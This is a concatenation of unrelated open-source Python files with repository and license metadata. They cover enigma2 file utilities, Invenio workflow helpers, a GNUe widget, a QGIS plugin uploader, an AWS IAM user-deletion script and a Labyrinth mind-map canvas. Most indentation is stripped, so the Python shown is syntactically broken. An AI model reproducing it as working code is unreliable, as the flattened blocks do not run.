print "copy stats for", src, "failed!"
# Renames files or if source and destination are on different devices moves them in background
# input list of (source, destination)
def moveFiles(fileList):
movedList = []
try:
try:
for item in fileList:
os_rename(item[0], item[1])
movedList.append(item)
except OSError, e:
if e.errno == 18:
print "[Directories] cannot rename across devices, trying slow move"
import Screens.CopyFiles
Screens.CopyFiles.moveFiles(fileList, item[0])
print "[Directories] Moving in background..."
else:
raise
except Exception, e:
print "[Directories] Failed move:", e
for item in movedList:
try:
os_rename(item[1], item[0])
except:
print "[Directories] Failed to undo move:", item
raise
def getSize(path, pattern=".*"):
path_size = 0
if os.path.isdir(path):
files = crawlDirectory(path, pattern)
for file in files:
filepath = os.path.join(file[0], file[1])
path_size += os.path.getsize(filepath)
elif os.path.isfile(path):
path_size = os.path.getsize(path)
return path_size
|
MOA-2011/enigma2
|
lib/python/Tools/Directories.py
|
Python
|
gpl-2.0
| 10,585
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2012, 2013, 2014, 2015, 2016 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Various utility functions for use across the workflows module."""
from __future__ import absolute_import, print_function
from flask import current_app, jsonify, render_template, session
import msgpack
from math import ceil
from six import text_type, string_types
from werkzeug import import_string
from invenio_workflows import WorkflowObject, workflows
from .proxies import current_workflows_ui
class Pagination(object):
"""Helps with rendering pagination list."""
def __init__(self, page, per_page, total_count):
self.page = page
self.per_page = per_page
self.total_count = total_count
@property
def pages(self):
"""Returns number of pages."""
return int(ceil(self.total_count / float(self.per_page)))
@property
def has_prev(self):
"""Returns true if it has previous page."""
return self.page > 1
@property
def has_next(self):
"""Returns true if it has next page."""
return self.page < self.pages
def iter_pages(self, left_edge=1, left_current=1,
right_current=3, right_edge=1):
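        """Yield the page numbers for a pagination bar, with None marking a
        gap between the kept edges and the window around the current page."""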
last = 0
for num in xrange(1, self.pages + 1):
if num <= left_edge or \
(num > self.page - left_current - 1 and
num < self.page + right_current) or \
num > self.pages - right_edge:
if last + 1 != num:
yield None
yield num
last = num
def get_formatted_workflow_object(bwo, date_format='%Y-%m-%d %H:%M:%S.%f'):
"""Return the formatted output, from cache if available."""
results = current_workflows_ui.get("row::{0}".format(bwo.id))
if results:
results = msgpack.loads(results)
if results["date"] == bwo.modified.strftime(date_format):
return results
results = generate_formatted_workflow_object(bwo)
if results:
current_workflows_ui.set(
"row::{0}".format(bwo.id),
msgpack.dumps(results)
)
return results
def generate_formatted_workflow_object(
bwo, date_format='%Y-%m-%d %H:%M:%S.%f'):
"""Generate a dict with formatted column data from workflows UI object."""
from invenio_workflows import workflows
from .definitions import WorkflowBase
workflows_name = bwo.get_workflow_name()
if workflows_name and workflows_name in workflows and \
hasattr(workflows[workflows_name], 'get_description'):
workflow_definition = workflows[workflows_name]
else:
workflow_definition = WorkflowBase
action_name = bwo.get_action() or ""
action = current_workflows_ui.actions.get(action_name, None)
mini_action = getattr(action, "render_mini", "")
if mini_action:
mini_action = action().render_mini(bwo)
results = {
"name": workflows_name,
"description": workflow_definition.get_description(bwo),
"title": workflow_definition.get_title(bwo),
"date": bwo.modified.strftime(date_format),
"additional": workflow_definition.get_additional(bwo),
"action": mini_action,
"sort_data": workflow_definition.get_sort_data(bwo)
}
return results
def get_data_types():
"""Return a list of distinct data types from WorkflowObject."""
return list(
current_app.config.get('WORKFLOWS_UI_DATA_TYPES', dict()).keys()
)
def get_workflow_names():
"""Return a list of distinct data types from WorkflowObject."""
return [workflow.name for workflow in workflows.values()
if hasattr(workflow, 'name')]
def get_rendered_row(obj_id):
"""Return a single formatted row."""
bwo = WorkflowObject.query.get(obj_id) # noqa
if not bwo:
current_app.logger.error("workflow object not found for {0}".format(obj_id))
return ""
preformatted = get_formatted_workflow_object(bwo)
return render_template(
current_app.config["WORKFLOWS_UI_LIST_ROW_TEMPLATE"],
title=preformatted.get("title", ""),
object=bwo,
action=preformatted.get("action", ""),
description=preformatted.get("description", ""),
additional=preformatted.get("additional", "")
)
def get_rows(results):
"""Return all rows formatted."""
id_list = [hit.id for hit in results.hits]
session['workflows_ui_current_ids'] = id_list
return [get_rendered_row(bid)
for bid in id_list]
def get_previous_next_objects(object_list, current_object_id):
"""Return tuple of (previous, next) object for given workflows UI object."""
if not object_list:
return None, None
try:
current_index = object_list.index(current_object_id)
except ValueError:
# current_object_id not in object_list:
return None, None
try:
next_object_id = object_list[current_index + 1]
except IndexError:
next_object_id = None
try:
if current_index == 0:
previous_object_id = None
else:
previous_object_id = object_list[current_index - 1]
except IndexError:
previous_object_id = None
return previous_object_id, next_object_id
def get_func_info(func):
"""Retrieve a function's information."""
name = func.func_name
doc = func.func_doc or ""
try:
nicename = func.description
except AttributeError:
if doc:
nicename = doc.split('\n')[0]
if len(nicename) > 80:
nicename = name
else:
nicename = name
parameters = []
closure = func.func_closure
varnames = func.func_code.co_freevars
if closure:
for index, arg in enumerate(closure):
if not callable(arg.cell_contents):
parameters.append((varnames[index],
text_type(arg.cell_contents)))
return ({
"nicename": nicename,
"doc": doc,
"parameters": parameters,
"name": name
})
def get_workflow_info(func_list):
"""Return function info, go through lists recursively."""
funcs = []
for item in func_list:
if item is None:
continue
if isinstance(item, list):
funcs.append(get_workflow_info(item))
else:
funcs.append(get_func_info(item))
return funcs
def obj_or_import_string(value, default=None):
"""Import string or return object."""
if isinstance(value, string_types):
return import_string(value)
elif value:
return value
return default
|
jalavik/invenio-workflows-ui
|
invenio_workflows_ui/utils.py
|
Python
|
gpl-2.0
| 7,380
|
from gnue.forms.input.GFKeyMapper import KeyMapper
from src.gnue.forms.uidrivers.java.widgets._base import UIWidget
from src.gnue.forms.uidrivers.java.widgets._remote import List
_all__ = ["UIList"]
# =============================================================================
# Interface implementation for a grid widget
# =============================================================================
class UIList(UIWidget):
def _create_widget_ (self, event):
self.widget = List(self, self._gfObject.label or "", self._gfObject.style)
self.getParent().addWidget(self)
def is_growable(self):
return True
def _ui_set_values_(self, values):
self.widget.uiSetValues(values)
def _ui_set_value_(self, index, value):
self.widget.uiSetValue(index, value)
def _ui_select_row_(self, index):
self.widget.uiSelectRow(index)
def addWidget(self, ui_widget):
"""
        Add a given UI widget to the list.
        @param ui_widget: widget to add to the list
"""
self.widget.uiAdd(ui_widget.widget)
def onSelectionChanged(self, index):
self._gfObject._event_item_focused(index)
def onSetFocus(self):
self._gfObject._event_set_focus()
# navigable
def _ui_set_focus_(self):
self.widget.uiSetFocus()
def onKeyPressed(self, keycode, shiftDown, ctrlDown, altDown):
command, args = KeyMapper.getEvent(keycode, shiftDown, ctrlDown, altDown)
if command:
self._request(command, triggerName=args)
# =============================================================================
# Configuration data
# =============================================================================
configuration = {
'baseClass': UIList,
'provides' : 'GFList',
'container': True
}
|
HarmonyEnterpriseSolutions/harmony-platform
|
src/gnue/forms/uidrivers/java/widgets/list_.py
|
Python
|
gpl-2.0
| 1,699
|
#!/usr/bin/env python
# This script uploads a plugin package on the server
#
# Author: A. Pasotti, V. Picavet
import getpass
from optparse import OptionParser
import sys
import xmlrpclib
# Configuration
PROTOCOL = 'http'
SERVER = 'plugins.qgis.org'
PORT = '80'
ENDPOINT = '/plugins/RPC2/'
VERBOSE = False
def main(options, args):
address = "%s://%s:%s@%s:%s%s" % (PROTOCOL, options.username, options.password,
options.server, options.port, ENDPOINT)
    print "Connecting to: %s" % hidepassword(address)
server = xmlrpclib.ServerProxy(address, verbose=VERBOSE)
try:
plugin_id, version_id = server.plugin.upload(xmlrpclib.Binary(open(args[0]).read()))
        print "Plugin ID: %s" % plugin_id
        print "Version ID: %s" % version_id
except xmlrpclib.ProtocolError, err:
        print "A protocol error occurred"
        print "URL: %s" % hidepassword(err.url, 0)
        print "HTTP/HTTPS headers: %s" % err.headers
        print "Error code: %d" % err.errcode
        print "Error message: %s" % err.errmsg
except xmlrpclib.Fault, err:
        print "A fault occurred"
        print "Fault code: %d" % err.faultCode
        print "Fault string: %s" % err.faultString
def hidepassword(url, start=6):
"""Returns the http url with password part replaced with '*'."""
passdeb = url.find(':', start) + 1
passend = url.find('@')
return "%s%s%s" % (url[:passdeb], '*' * (passend - passdeb), url[passend:])
if __name__ == "__main__":
parser = OptionParser(usage="%prog [options] plugin.zip")
parser.add_option("-w", "--password", dest="password",
help="Password for plugin site", metavar="******")
parser.add_option("-u", "--username", dest="username",
help="Username of plugin site", metavar="user")
parser.add_option("-p", "--port", dest="port",
help="Server port to connect to", metavar="80")
parser.add_option("-s", "--server", dest="server",
help="Specify server name", metavar="plugins.qgis.org")
(options, args) = parser.parse_args()
if len(args) != 1:
        print "Please specify zip file.\n"
parser.print_help()
sys.exit(1)
if not options.server:
options.server = SERVER
if not options.port:
options.port = PORT
if not options.username:
# interactive mode
username = getpass.getuser()
        print "Please enter user name [%s] :" % username,
res = raw_input()
if res != "":
options.username = res
else:
options.username = username
if not options.password:
# interactive mode
options.password = getpass.getpass()
main(options, args)
|
blazek/lrs
|
lrs/plugin_upload.py
|
Python
|
gpl-2.0
| 2,882
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
from opinel.utils.aws import connect_service
from opinel.utils.cli_parser import OpinelArgumentParser
from opinel.utils.console import configPrintException, printError
from opinel.utils.credentials import read_creds
from opinel.utils.globals import check_requirements
from opinel.services.iam import delete_user
########################################
##### Main
########################################
def main():
# Parse arguments
parser = OpinelArgumentParser()
parser.add_argument('debug')
parser.add_argument('profile')
parser.add_argument('user-name', help = 'Name of the user(s) to be deleted.')
args = parser.parse_args()
# Configure the debug level
configPrintException(args.debug)
# Check version of opinel
if not check_requirements(os.path.realpath(__file__)):
return 42
# Require at least one user names
if not len(args.user_name):
printError("Error, you need to provide at least one user name.")
return 42
# Read creds
credentials = read_creds(args.profile[0])
if not credentials['AccessKeyId']:
return 42
# Connect to IAM APIs
iam_client = connect_service('iam', credentials)
if not iam_client:
return 42
# Delete users
for user in args.user_name:
delete_user(iam_client, user)
if __name__ == '__main__':
sys.exit(main())
|
iSECPartners/AWS-recipes
|
Python/awsrecipes_delete_iam_user.py
|
Python
|
gpl-2.0
| 1,451
|
#!/usr/bin/env python3
# Repeater Callsign for CWID
REPEATER_CALLSIGN="ON4SEB"
# CWID delay in minutes
BEACON_DELAY=10
# Repeater Startup message
REPEATER_STARTUP_MSG="QRV"
|
reec/pyRepeater
|
src/repeater_config.py
|
Python
|
gpl-2.0
| 177
|
# Copyright (C) 2008 Dejan Muhamedagic <dmuhamedagic@suse.de>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
import sys
import re
from singletonmixin import Singleton
def topics_dict(help_tab):
if not help_tab:
return {}
topics = {}
for topic in help_tab:
if topic != '.':
topics[topic] = None
return topics
def mk_completion_tab(obj,ctab):
from completion import get_completer_list
cmd_table = obj.cmd_table
for key,value in cmd_table.items():
if key.startswith("_"):
continue
if type(value) == type(object):
ctab[key] = {}
elif key == "help":
ctab[key] = topics_dict(obj.help_table)
else:
ctab[key] = get_completer_list(obj,key)
class Levels(Singleton):
'''
Keep track of levels and prompts.
'''
def __init__(self,start_level):
self._marker = 0
self._in_transit = False
self.level_stack = []
self.comp_stack = []
self.current_level = start_level()
self.parse_root = self.current_level.cmd_table
self.prompts = []
self.completion_tab = {}
mk_completion_tab(self.current_level,self.completion_tab)
def getprompt(self):
return ' '.join(self.prompts)
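    # mark()/release() bracket a tentative descent: mark() records the current
    # stack depth and release() drops any levels entered since that mark.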
def mark(self):
self._marker = len(self.level_stack)
self._in_transit = False
def release(self):
while len(self.level_stack) > self._marker:
self.droplevel()
def new_level(self,level_obj,token):
self.level_stack.append(self.current_level)
self.comp_stack.append(self.completion_tab)
self.prompts.append(token)
self.current_level = level_obj()
self.parse_root = self.current_level.cmd_table
try:
if not self.completion_tab[token]:
mk_completion_tab(self.current_level,self.completion_tab[token])
self.completion_tab = self.completion_tab[token]
except:
pass
self._in_transit = True
def previous(self):
if self.level_stack:
return self.level_stack[-1]
def droplevel(self):
if self.level_stack:
self.current_level.end_game(self._in_transit)
self.current_level = self.level_stack.pop()
self.completion_tab = self.comp_stack.pop()
self.parse_root = self.current_level.cmd_table
self.prompts.pop()
# vim:ts=4:sw=4:et:
|
ClusterLabs/pacemaker-1.0
|
shell/modules/levels.py
|
Python
|
gpl-2.0
| 3,125
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ui/directoryselectorbase.ui'
#
# Created: Mon Jul 29 20:12:07 2013
# by: PyQt4 UI code generator 4.9.1
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_DirectorySelector(object):
def setupUi(self, DirectorySelector):
DirectorySelector.setObjectName(_fromUtf8("DirectorySelector"))
DirectorySelector.resize(329, 27)
self.horizontalLayout = QtGui.QHBoxLayout(DirectorySelector)
self.horizontalLayout.setSpacing(0)
self.horizontalLayout.setMargin(0)
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.lineEdit = QtGui.QLineEdit(DirectorySelector)
self.lineEdit.setObjectName(_fromUtf8("lineEdit"))
self.horizontalLayout.addWidget(self.lineEdit)
self.btnSelect = QtGui.QToolButton(DirectorySelector)
self.btnSelect.setObjectName(_fromUtf8("btnSelect"))
self.horizontalLayout.addWidget(self.btnSelect)
self.retranslateUi(DirectorySelector)
QtCore.QMetaObject.connectSlotsByName(DirectorySelector)
def retranslateUi(self, DirectorySelector):
DirectorySelector.setWindowTitle(QtGui.QApplication.translate("DirectorySelector", "Form", None, QtGui.QApplication.UnicodeUTF8))
self.btnSelect.setText(QtGui.QApplication.translate("DirectorySelector", "...", None, QtGui.QApplication.UnicodeUTF8))
|
NaturalGIS/geotag_and_import_photos
|
ui/ui_directoryselectorbase.py
|
Python
|
gpl-2.0
| 1,577
|
#! /usr/bin/env python
# MMapArea.py
# This file is part of Labyrinth
#
# Copyright (C) 2006 - Don Scorgie <Don@Scorgie.org>
#
# Labyrinth is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Labyrinth is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Labyrinth; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor,
# Boston, MA 02110-1301 USA
#
import math
import time
import string
from gi.repository import Gtk
from gi.repository import Gdk
from gi.repository import Pango
from gi.repository import GObject
import gettext
import copy
import cairo
import logging
_ = gettext.gettext
import xml.dom.minidom as dom
import Links
import TextThought
import LabelThought
import ImageThought
import DrawingThought
import ResourceThought
import UndoManager
import utils
from BaseThought import BaseThought
from Links import Link
RAD_UP = (- math.pi / 2.)
RAD_DOWN = (math.pi / 2.)
RAD_LEFT = (math.pi)
RAD_RIGHT = (0)
MODE_NULL = 0
MODE_TEXT = 1
MODE_IMAGE = 2
MODE_DRAW = 3
MODE_RESOURCE = 4
MODE_LABEL = 5
VIEW_LINES = 0
VIEW_BEZIER = 1
# TODO: Need to expand to support popup menus
MENU_EMPTY_SPACE = 0
# UNDO actions
UNDO_MOVE = 0
UNDO_CREATE = 1
UNDO_DELETE = 2
UNDO_DELETE_SINGLE = 3
UNDO_COMBINE_DELETE_NEW = 4
UNDO_DELETE_LINK = 5
UNDO_STRENGTHEN_LINK = 6
UNDO_CREATE_LINK = 7
UNDO_ALIGN = 8
# Note: This is (atm) very broken. It will allow you to create new canvases, but not
# create new thoughts or load existing maps.
# To get it working either fix the TODO list at the bottom of the class, implement the
# necessary features within all the thought types. If you do, please send a patch ;)
# OR: Change this class to MMapAreaNew and MMapAreaOld to MMapArea
class MMapArea (Gtk.DrawingArea):
'''A MindMapArea Widget. A blank canvas with a collection of child thoughts.\
It is responsible for processing signals and such from the whole area and \
passing these on to the correct child. It also informs things when to draw'''
__gsignals__ = dict (
title_changed = (GObject.SignalFlags.RUN_FIRST,
None, (GObject.TYPE_STRING, )),
change_mode = (GObject.SignalFlags.RUN_LAST,
None,
(GObject.TYPE_INT, )),
change_buffer = (GObject.SignalFlags.RUN_LAST,
None,
(GObject.TYPE_OBJECT, )),
text_selection_changed = (GObject.SignalFlags.RUN_FIRST,
None,
(GObject.TYPE_INT, GObject.TYPE_INT,
GObject.TYPE_STRING)),
thought_selection_changed = (GObject.SignalFlags.RUN_FIRST,
None,
(GObject.TYPE_PYOBJECT,
GObject.TYPE_PYOBJECT)),
set_focus = (GObject.SignalFlags.RUN_FIRST, None,
(GObject.TYPE_PYOBJECT, GObject.TYPE_BOOLEAN)),
set_attrs = (GObject.SignalFlags.RUN_LAST,
None,
(GObject.TYPE_BOOLEAN, GObject.TYPE_BOOLEAN,
GObject.TYPE_BOOLEAN, Pango.FontDescription)),
link_selected = (GObject.SignalFlags.RUN_FIRST,
None,
()))
def __init__(self, undo):
super (MMapArea, self).__init__()
self.thoughts = []
self.links = []
self.selected = []
self.num_selected = 0
self.primary = None
self.pango_context = self.create_pango_context()
self.undo = undo
self.scale_fac = 1.0
self.translate = False
self.translation = [0.0,0.0]
self.timeout = -1
self.current_cursor = None
self.do_filter = True
self.is_bbox_selecting = False
self.nthoughts = 0
impl = dom.getDOMImplementation()
self.save = impl.createDocument("http://www.donscorgie.blueyonder.co.uk/labns", "MMap", None)
self.element = self.save.documentElement
self.im_context = Gtk.IMMulticontext ()
self.mode = MODE_NULL
self.old_mode = MODE_NULL
self.connect ("expose_event", self.expose)
self.connect ("button_release_event", self.button_release)
self.connect ("button_press_event", self.button_down)
self.connect ("motion_notify_event", self.motion)
self.connect ("key_press_event", self.key_press)
self.connect ("key_release_event", self.key_release)
self.connect ("scroll_event", self.scroll)
self.commit_handler = None
self.title_change_handler = None
self.drag_mode = False
self._dragging = False
self.sw = None
self.hadj = 0
self.vadj = 0
self.origin_x = None
self.origin_y = None
self.moving = False
self.move_mode = False
self.move_origin = None
self.move_origin_new = None
self.focus = None
self.move_action = None
self.current_root = []
self.rotation = 0
self.text_attributes = {}
self.set_events (Gdk.EventMask.KEY_PRESS_MASK |
Gdk.EventMask.KEY_RELEASE_MASK |
Gdk.EventMask.BUTTON_PRESS_MASK |
Gdk.EventMask.BUTTON_RELEASE_MASK |
Gdk.EventMask.POINTER_MOTION_MASK |
Gdk.EventMask.SCROLL_MASK
)
self.set_flags (Gtk.CAN_FOCUS)
# set theme colors
w = Gtk.Window()
w.realize()
style = w.get_style()
self.pango_context.set_font_description(style.font_desc)
# FIXME: rude hack to remove fontsize from font name
parts = style.font_desc.to_string().split()
try:
float(parts[-1])
self.font_name = string.join(parts[0:-2])
except ValueError:
self.font_name = style.font_desc.to_string()
utils.default_font = self.font_name
self.font_size = utils.default_font_size
utils.default_colors["text"] = utils.gtk_to_cairo_color(style.text[Gtk.StateType.NORMAL])
utils.default_colors["base"] = utils.gtk_to_cairo_color(style.base[Gtk.StateType.NORMAL])
# Match the fixed white canvas colour (makes thought focus visible)
self.background_color = style.white
self.foreground_color = style.black
utils.default_colors["bg"] = utils.gtk_to_cairo_color(style.bg[Gtk.StateType.NORMAL])
utils.default_colors["fg"] = utils.gtk_to_cairo_color(style.fg[Gtk.StateType.NORMAL])
utils.selected_colors["text"] = utils.gtk_to_cairo_color(style.text[Gtk.StateType.SELECTED])
utils.selected_colors["bg"] = utils.gtk_to_cairo_color(style.bg[Gtk.StateType.SELECTED])
utils.selected_colors["fg"] = utils.gtk_to_cairo_color(style.fg[Gtk.StateType.SELECTED])
utils.selected_colors["fill"] = utils.gtk_to_cairo_color(style.base[Gtk.StateType.SELECTED])
def set_text_attributes(self, text_attributes):
return
'''
self.font_combo_box = text_attributes.props.page.fonts_combo_box.combo
self.font_sizes_combo_box = utils.default_font_size #text_attributes.props.page.font_sizes_combo_box.combo
'''
def transform_coords(self, loc_x, loc_y):
if hasattr(self, "transform"):
return self.transform.transform_point(loc_x, loc_y)
def untransform_coords(self, loc_x, loc_y):
if hasattr(self, "untransform"):
return self.untransform.transform_point(loc_x, loc_y)
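    # Note: both helpers return None until self.transform / self.untransform
    # exist (they are presumably installed by the drawing code).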
def button_down (self, widget, event):
if self.drag_mode:
self.set_cursor(Gdk.HAND2)
self.origin_x = event.x
self.origin_y = event.y
self._dragging = True
return
if event.button == 2 or \
event.button == 1 and self.translate == True:
self.set_cursor (Gdk.FLEUR)
self.original_translation = self.translation
self.origin_x = event.x
self.origin_y = event.y
return
coords = self.transform_coords (event.get_coords()[0], event.get_coords()[1])
obj = self.find_object_at (coords)
if obj:
if event.button == 3 or self.move_mode:
if self.move_mode:
self.moving = True
else:
self.moving = not (event.get_state() & Gdk.ModifierType.CONTROL_MASK)
if self.moving:
self.set_cursor(Gdk.FLEUR)
self.move_origin = (coords[0], coords[1])
self.move_origin_new = self.move_origin
if obj == self.focus:
self.focus.enter()
else:
self.set_focus(obj, event.get_state())
obj.process_button_down(event, coords)
elif self.mode and event.button == 1 and widget:
self.embody_thought(event)
elif event.button == 1 and self.mode == MODE_NULL:
self.bbox_origin = coords
self.is_bbox_selecting = True
def undo_move (self, action, mode):
self.undo.block ()
move_thoughts = action.args[1]
old_coords = action.args[0]
new_coords = action.args[2]
move_x = old_coords[0] - new_coords[0]
move_y = old_coords[1] - new_coords[1]
if mode == UndoManager.REDO:
move_x = -move_x
move_y = -move_y
self.unselect_all ()
for t in move_thoughts:
self.select_thought (t, -1)
t.move_by (move_x, move_y)
self.undo.unblock ()
self.invalidate ((old_coords[0], old_coords[1], new_coords[0], new_coords[1]))
def button_release (self, widget, event):
if self._dragging:
self.set_cursor(Gdk.CursorType.LEFT_PTR)
self._dragging = False
coords = self.transform_coords (event.get_coords()[0], event.get_coords()[1])
if self.is_bbox_selecting:
self.is_bbox_selecting = False
self.invalidate ()
try:
if abs(self.bbox_origin[0] - coords[0]) > 2.0:
return True
except AttributeError: # no bbox_current
pass
if self.translate:
self.translate = False
return True
if self.moving and self.move_action:
self.move_action.add_arg (coords)
self.undo.add_undo (self.move_action)
self.move_action = None
was_moving = False
if self.moving:
was_moving = True
self.stop_moving()
obj = self.find_object_at (coords)
if event.button == 2:
self.undo.add_undo (UndoManager.UndoAction (self, UndoManager.TRANSFORM_CANVAS, \
self.undo_transform_cb,
self.scale_fac, self.scale_fac,
self.original_translation,
self.translation))
if obj:
if not obj.process_button_release(event, coords):
                # prolonged creation failed
self.undo.forget_action()
else:
self.update_view(obj)
if len(self.selected) != 1:
self.invalidate() # does not invalidate correctly with obj.get_max_area()
return True
self.invalidate ()
if was_moving:
self.start_moving(self.move_button)
return True
def undo_transform_cb (self, action, mode):
if mode == UndoManager.UNDO:
self.scale_fac = action.args[0]
self.translation = action.args[2]
else:
self.scale_fac = action.args[1]
self.translation = action.args[3]
self.invalidate ()
def scroll (self, widget, event):
scale = self.scale_fac
if event.direction == Gdk.ScrollDirection.UP:
self.scale_fac*=1.2
elif event.direction == Gdk.ScrollDirection.DOWN:
self.scale_fac/=1.2
self.undo.add_undo (UndoManager.UndoAction (self, UndoManager.TRANSFORM_CANVAS, \
self.undo_transform_cb,
scale, self.scale_fac, self.translation,
self.translation))
self.invalidate()
def undo_joint_cb (self, action, mode):
delete = action.args[0]
create = action.args[1]
if mode == UndoManager.UNDO:
self.undo_create_cb (create, mode)
self.undo_deletion (delete, mode)
else:
self.undo_deletion (delete, mode)
self.undo_create_cb (create, mode)
self.invalidate ()
def key_press (self, widget, event):
# Support for canvas panning keys ('hand' on XO, 'cmd' on Macs)
if event.hardware_keycode == 133 or event.hardware_keycode == 134:
self.translate = True
if not self.do_filter or not self.im_context.filter_keypress (event):
if self.focus:
if self.focus.creating or \
not self.focus.process_key_press (event, self.mode):
return self.global_key_handler (event)
return True
if len(self.selected) != 1 or not self.selected[0].process_key_press (event, self.mode):
return self.global_key_handler (event)
return True
def key_release (self, widget, event):
# Support for canvas panning keys ('hand' on XO, 'cmd' on Macs)
if event.hardware_keycode == 133 or event.hardware_keycode == 134:
self.translate = False
self.im_context.filter_keypress (event)
return True
def motion (self, widget, event):
if self._dragging:
if self.origin_x is None:
self.origin_x = event.get_coords()[0]
self.origin_y = event.get_coords()[1]
dx = self.origin_x - event.get_coords()[0]
dy = self.origin_y - event.get_coords()[1]
self.origin_x = event.get_coords()[0]
self.origin_y = event.get_coords()[1]
self._adjust_sw(dx, dy)
return True
coords = self.transform_coords (event.get_coords()[0], event.get_coords()[1])
if event.get_state() & Gdk.ModifierType.BUTTON1_MASK and self.is_bbox_selecting:
self.bbox_current = coords
self.invalidate()
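            # normalise the rubber-band corners so ul is always the upper-left
            # and lr the lower-right, whichever direction the user dragged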
ul = [ self.bbox_origin[0], self.bbox_origin[1] ]
lr = [ coords[0], coords[1] ]
if self.bbox_origin[0] > coords[0]:
if self.bbox_origin[1] < coords[1]:
ul[0] = coords[0]
ul[1] = self.bbox_origin[1]
lr[0] = self.bbox_origin[0]
lr[1] = coords[1]
else:
ul = coords
lr = self.bbox_origin
elif self.bbox_origin[1] > coords[1]:
ul[0] = self.bbox_origin[0]
ul[1] = coords[1]
lr[0] = coords[0]
lr[1] = self.bbox_origin[1]
            # FIXME: O(n) hit-testing over every thought per motion event is slow for large maps
for t in self.thoughts:
if t.lr[0] > ul[0] and t.ul[1] < lr[1] and t.ul[0] < lr[0] and t.lr[1] > ul[1] :
if t not in self.selected:
self.select_thought(t, Gdk.ModifierType.SHIFT_MASK)
else:
if t in self.selected:
t.unselect()
self.selected.remove(t)
return True
elif self.moving:
            self.set_cursor(Gdk.CursorType.FLEUR)
if not self.move_action:
self.move_action = UndoManager.UndoAction (self, UNDO_MOVE, self.undo_move, self.move_origin,
self.selected)
for t in self.selected:
t.move_by (coords[0] - self.move_origin_new[0], coords[1] - self.move_origin_new[1])
self.move_origin_new = (coords[0], coords[1])
self.invalidate ()
return True
elif event.get_state() & Gdk.ModifierType.BUTTON2_MASK or \
event.get_state() & Gdk.ModifierType.BUTTON1_MASK and self.translate:
self.translate = True
self.translation[0] -= (self.origin_x - event.x) / self.scale_fac
self.translation[1] -= (self.origin_y - event.y) / self.scale_fac
self.origin_x = event.x
self.origin_y = event.y
self.invalidate()
return True
obj = self.find_object_at (coords)
if obj and obj.handle_motion(event, coords):
self.update_links_cb(obj)
self.update_view(obj)
return True
def find_object_at (self, coords):
if self.focus and self.focus.includes(coords):
return self.focus
for x in reversed(self.thoughts):
if x != self.focus and not isinstance(x, Link) and x.includes (coords):
return x
        for x in self.links:
            # every entry here is a Link, so the isinstance(x, Link) filter
            # used in the thoughts loop above would wrongly skip them all
            if x != self.focus and x.includes (coords):
                return x
return None
def realize_cb (self, widget):
self.disconnect (self.realize_handle)
if self.mode == MODE_IMAGE or self.mode == MODE_DRAW:
self.set_cursor (Gdk.CursorType.CROSSHAIR)
else:
self.set_cursor (Gdk.CursorType.LEFT_PTR)
return False
def set_cursor(self, kind):
new_cursor = CursorFactory().get_cursor(kind)
if self.current_cursor != new_cursor:
self.current_cursor = new_cursor
self.window.set_cursor(self.current_cursor)
def set_mode (self, mode):
if mode == self.mode:
return
self.old_mode = self.mode
self.mode = mode
self.hookup_im_context ()
if self.window:
if mode == MODE_IMAGE or mode == MODE_DRAW:
self.set_cursor (Gdk.CursorType.CROSSHAIR)
else:
self.set_cursor (Gdk.CursorType.LEFT_PTR)
else:
self.realize_handle = self.connect ("realize", self.realize_cb)
self.mode = mode
if self.window:
self.invalidate ()
def title_changed_cb (self, widget, new_title):
self.emit ("title_changed", new_title)
def make_primary (self, thought):
if self.primary:
print "Warning: Already have a primary root"
if self.title_change_handler:
self.primary.disconnect (self.title_change_handler)
self.title_change_handler = thought.connect ("title_changed", self.title_changed_cb)
self.emit ("title_changed", thought.text)
self.primary = thought
thought.make_primary ()
def hookup_im_context (self, thought = None):
if self.commit_handler:
self.im_context.disconnect (self.commit_handler)
self.im_context.disconnect (self.delete_handler)
self.im_context.disconnect (self.preedit_changed_handler)
self.im_context.disconnect (self.preedit_end_handler)
self.im_context.disconnect (self.preedit_start_handler)
self.im_context.disconnect (self.retrieve_handler)
self.commit_handler = None
if thought:
try:
self.commit_handler = self.im_context.connect ("commit", thought.commit_text, self.mode, None, None)
# self.font_combo_box, self.font_sizes_combo_box)
self.delete_handler = self.im_context.connect ("delete-surrounding", thought.delete_surroundings, self.mode)
self.preedit_changed_handler = self.im_context.connect ("preedit-changed", thought.preedit_changed, self.mode)
self.preedit_end_handler = self.im_context.connect ("preedit-end", thought.preedit_end, self.mode)
self.preedit_start_handler = self.im_context.connect ("preedit-start", thought.preedit_start, self.mode)
self.retrieve_handler = self.im_context.connect ("retrieve-surrounding", thought.retrieve_surroundings, \
self.mode)
self.do_filter = True
except AttributeError:
self.do_filter = False
else:
self.do_filter = False
